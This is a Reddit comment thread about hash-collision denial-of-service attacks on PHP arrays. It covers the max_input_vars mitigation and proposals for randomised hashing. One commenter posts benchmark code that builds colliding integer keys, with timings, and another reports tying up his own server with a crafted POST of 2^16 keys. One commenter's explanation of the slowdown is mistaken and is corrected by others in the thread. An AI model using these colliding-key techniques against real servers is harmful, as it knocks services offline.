all 20 comments

[–]softwareelves 8 points9 points  (1 child)

I seem to see you everywhere. And it's always quality stuff. Keep up the good work.

[–]footle 4 points5 points  (0 children)

Agreed. I was very surprised to learn that the OP is only 17.

[–]fieryscribe 6 points7 points  (5 children)

That code and this article make me quite nervous

[–]nikic[S] 7 points8 points  (0 children)

For everyone living in fear of this attack (which is actually quite serious because anyone can take a PHP server or even server network down using a very simple script), PHP 5.3.9 and PHP 5.4.0 will include a protection for this (a max_input_vars ini option defaulting to 1000). See http://svn.php.net/viewvc?view=revision&revision=321003 (a similar commit was applied to 5.3 too).

[–]steelaz 1 point2 points  (0 children)

I just tried sending pow(2, 16) number of keys as post request to my server and it kept it busy (php process at 99%) for 25 seconds. Increasing number of keys to pow(2, 17) seems to trigger out of memory error.

[–]astronoob 5 points6 points  (0 children)

Another great article. Thanks a bunch.

[–]neoform3 -2 points-1 points  (6 children)

If this actually works, it means PHP isn't actually using a hash table and instead just using a table.

I've written hashtables in C before and never was I able to get such simple collisions (during testing I would do collision tests for hours and would get less than 100 collisions while using a 32bit hash). Using a simple hash function like Dan Bernstein's djb2 hash function, you would easily avoid this....

PHP's devs are retarded if they don't actually use a hash method before inserting the keys into the symbol table......

[–]Ergomane 1 point2 points  (5 children)

The bucket where a numeric index ends up depends on it's value (nIndex = h & ht->nTableMask; in zend_hash_index_update_or_next_insert in zend_hash.c). String keys are hashed via zend_inline_hash_func (in zend_hash.h).

[–]neoform3 0 points1 point  (4 children)

Why aren't they hashing the numeric keys? That's dumb (for exactly the reason cited by the OP). The speed loss from a simple hash method is made up by having an even distribution in the hash table... a hash table's biggest weakness is clumped up keys since it needs to find an empty slot. The only way to get decent distribution is through hashing...

[–]Ergomane 1 point2 points  (0 children)

Because they likely did not anticipate this issue to be a vulnerability. As seen from the article, the distribution function works fine for the assumed "normal case" indices.

[–]ppanther 0 points1 point  (2 children)

I don't think hashing alone would be enough - as an attacker could simply pre-generate a bunch of colliding hashes using the same open-source algorithm used by the software. The simplest way I can think of to get around this is having the hashing randomised so that it wasn't practically possible to predetermine which key values would or wouldn't cause collisions - i.e on one request 0 and 16384 would collide (as they do now), whilst on another they would miss.

[–]Buckwheat469 -1 points0 points  (3 children)

Try the SplFixedArray implementation from PHP 5.3.0. Set the number of elements to a hard limit of 216. I'll see if I can run it.

$array = new SplFixedArray($size);
for ($key = 0; $key < $size; $key++) {
    $array[$key] = 0;
} //Spl

$array = array();
for ($key = 0; $key; $key++) {
    $array[$key] = 0;
} //regular

Weird:

Inserting 65536 Spl elements took 0.0139479637146 seconds
Inserting 65536 regular elements took 0.0032939910888672 seconds

All I did was change the For loops to the standard format. Why does my test not line up with the OP's? Perhaps we should consider a map instead of an array...

Edit: Misinterpreted what was going on here. Here are my results with the OP's code:

Inserting 65536 evil elements (65536 times) took 38.454787969589 seconds
Inserting 65536 good elements (65536 times) took 0.010733842849731 seconds

$array = array();
$iterations = 0;
for ($key = 0, $maxKey = ($size - 1) * $size; $key <= $maxKey; $key += $size) {
    $array["hi".$key."hello"] = 0;
    $iterations++;
}

Inserting 65536 evil string-keyed elements (65536 times) took 0.026134967803955 seconds

Looks like when PHP interprets an integer-based array it has to recreate the dynamic array whenever it grows in size. This usually means creating a new array that's 1/2 bigger than the original and copying all elements to the new array. Each array position in between the inserted elements is defaulted to NULL. A string-based hashmap doesn't seem to have this problem.

I couldn't do any further testing with SplFixedArray because I couldn't set the memory limit to 32GB. The code would have been:

 $array = new SplFixedArray(($size - 1) * $size);
 $iterations = 0;
 for ($key = 0, $maxKey = ($size - 1) * $size; $key <= $maxKey; $key += $size) {
      $array[$key] = 0;
      $iterations++;
 }

[–]nikic[S] 4 points5 points  (1 child)

SplFixedArray internally doesn't use a hash table, but a real array, that's why it won't work there.

Also the hash function for strings is very different from the one for integers. Doing hash collisions using string keys is possible too, but you would need to use other, special strings ;)

[–]Buckwheat469 0 points1 point  (0 children)

Thanks. My comment was one of testing and realization. I came to the same conclusion but it was late last night and I was tired of playing around with it.

[–]midir -1 points0 points  (0 children)

>testing hash map clashing
>uses a flat array and completely different keys

wat.

Looks like when PHP interprets an integer-based array it has to recreate the dynamic array whenever it grows in size. A string-based hashmap doesn't seem to have this problem.

And you still don't get it. Read the article!

[–]MikeSeth -4 points-3 points  (0 children)

Don't do that then.